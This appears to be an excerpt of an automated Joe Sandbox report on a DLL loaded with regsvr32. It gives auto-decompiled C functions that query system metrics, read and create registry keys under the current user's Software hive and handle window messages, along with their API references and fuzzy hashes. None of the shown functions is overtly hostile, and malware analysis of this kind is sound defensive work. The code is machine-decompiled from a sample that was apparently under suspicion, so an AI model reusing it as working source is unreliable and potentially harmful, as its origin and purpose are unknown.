Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0xe86d94f5
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

0x1000bd98
0x1000bd98
0x1000bd98
0x1000bd9f
0x1000bda3
0x1000bdaa
0x1000bdb0
0x1000bdb7
0x1000bdbe
0x1000bdc0
0x1000bdc3
0x1000bdc6
0x1000bdcd
0x1000bdd0
0x1000bdd2
0x1000bdd2
0x1000bdd5
0x1000bdd6
0x1000bdd8
0x1000bddd
0x1000bddf
0x1000bde1
0x1000bde8
0x1000bdea
0x1000bdea
0x1000bded
0x1000bded
0x1000bdd2
0x1000bdf2
0x1000bdf5
0x1000bed2
0x1000bed8
0x1000bee0
0x1000bee1
0x1000bee2
0x1000beeb
0x1000bef0
0x1000bef7
0x1000bdfb
0x1000bdfd
0x1000be03
0x1000be05
0x1000be0c
0x1000be14
0x1000be1f
0x1000be22
0x1000be27
0x1000be2f
0x1000be33
0x1000be34
0x1000be39
0x1000be3c
0x1000be40
0x1000be44
0x1000be45
0x1000be53
0x1000be57
0x1000be5f
0x1000be65
0x1000be66
0x1000be73
0x1000be79
0x1000be7b
0x1000be90
0x1000be95
0x1000be9a
0x1000be9b
0x1000be9c
0x1000be9c
0x1000bea4
0x1000bea4
0x1000beb6
0x1000bec2
0x1000beca
0x1000becd
0x00000000
0x1000be07
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000be05

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

0x1000f6f2
0x1000f6fb
0x1000f703
0x1000f705
0x1000f709
0x1000f70d
0x1000f71b
0x1000f71b
0x1000f720
0x1000f726
0x1000f72a
0x1000f72e
0x1000f733
0x1000f739
0x1000f7b1
0x1000f7b1
0x1000f7b1
0x1000f7b5
0x00000000
0x00000000
0x1000f74d
0x1000f74f
0x1000f7b7
0x1000f7b7
0x1000f7b7
0x1000f7be
0x00000000
0x00000000
0x1000f7c2
0x1000f7c8
0x1000f7d0
0x1000f7dd
0x1000f7e5
0x1000f7e7
0x1000f7e7
0x1000f7d0
0x1000f7eb
0x1000f7ed
0x1000f7f3
0x1000f7f5
0x1000f830
0x1000f830
0x1000f830
0x00000000
0x1000f7f7
0x1000f7fb
0x1000f802
0x1000f803
0x1000f805
0x1000f80d
0x1000f80d
0x1000f821
0x00000000
0x1000f823
0x00000000
0x1000f823
0x1000f821
0x1000f7f5
0x1000f825
0x1000f826
0x00000000
0x1000f82b
0x1000f751
0x1000f753
0x1000f757
0x1000f759
0x1000f761
0x1000f763
0x1000f763
0x1000f763
0x1000f765
0x1000f76a
0x1000f76c
0x1000f770
0x1000f772
0x1000f776
0x1000f785
0x1000f785
0x1000f776
0x1000f770
0x1000f78b
0x1000f790
0x1000f7ad
0x1000f7ad
0x00000000
0x1000f792
0x1000f79f
0x1000f7a5
0x1000f7a9
0x1000f7ab
0x00000000
0x00000000
0x00000000
0x1000f7ab
0x1000f790
0x00000000

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32 ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32(?,00000121,00000000,?), ref: 1000F785
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32 ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

0x1000ae8a
0x1000ae8a
0x1000ae8a
0x1000ae8f
0x1000aeaa
0x1000aeac
0x1000aeae
0x1000aeb9
0x1000aebf
0x1000aec1
0x1000aec3
0x1000aec4
0x100142c8
0x100142ca
0x100142cd
0x100142cf
0x100142f1
0x00000000
0x100142d1
0x100142d1
0x100142d6
0x100142d8
0x100142e9
0x100142e9
0x100142f0
0x100142f0
0x1000aec6
0x10014229
0x10014229
0x1001422a
0x1001422b
0x1001422c
0x1001422d
0x1001422e
0x10014232
0x10014238
0x1001423e
0x10014257
0x10014257
0x10014259
0x1001425b
0x00000000
0x00000000
0x1001424b
0x1001424d
0x1001424f
0x100142c1
0x100142c6
0x10014251
0x10014252
0x00000000
0x10014252
0x00000000
0x1001424f
0x1001425d
0x10014275
0x10014275
0x10014277
0x10014279
0x00000000
0x00000000
0x10014269
0x1001426b
0x1001426d
0x00000000
0x1001426f
0x10014270
0x00000000
0x10014270
0x00000000
0x1001426d
0x1001427b
0x1001427f
0x10014284
0x10014286
0x10014290
0x100142a7
0x100142a7
0x100142a9
0x100142ab
0x100142ac
0x00000000
0x00000000
0x1001429b
0x1001429d
0x1001429f
0x100142a2
0x00000000
0x100142a2
0x00000000
0x1001429f
0x100142bf
0x00000000
0x10014288
0x00000000
0x10014288
0x10014286
0x1000aeb0
0x1000a0db
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000ae91
0x1000ae91
0x1000ae96
0x00000000
0x1000ae9d
0x1000aea3
0x1000aea3
0x00000000

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001424B
GetFocus.USER32 ref: 1001425D
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001429B
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 100142BF

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x1000fc93
0x1000fc9a
0x1000fca0
0x1000fca5
0x1000fcca
0x1000fcca
0x1000fcd0
0x1000fcd2
0x1000fcd2
0x1000fcd0
0x1000fcd5
0x1000fcda
0x1000fcde
0x1000fce1
0x1000fce1
0x1000fce4
0x1000fcec
0x1000fcf1
0x1000fcf1
0x1000fcf4
0x1000fcf8
0x1000fcfb
0x1000fd02
0x1000fd07
0x1000fd09
0x1000fd0d
0x1000fd17
0x1000fd1c
0x1000fd22
0x1000fd25
0x1000fd36
0x1000fd3d
0x1000fd40
0x1000fd40
0x1000fd0d
0x1000fd07
0x1000fd56
0x1000fd58
0x1000fd67
0x1000fd73
0x1000fd77
0x1000fd7f
0x1000fd7f
0x1000fd77
0x1000fd87
0x1000fd9a

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32(?,000000FC,?), ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
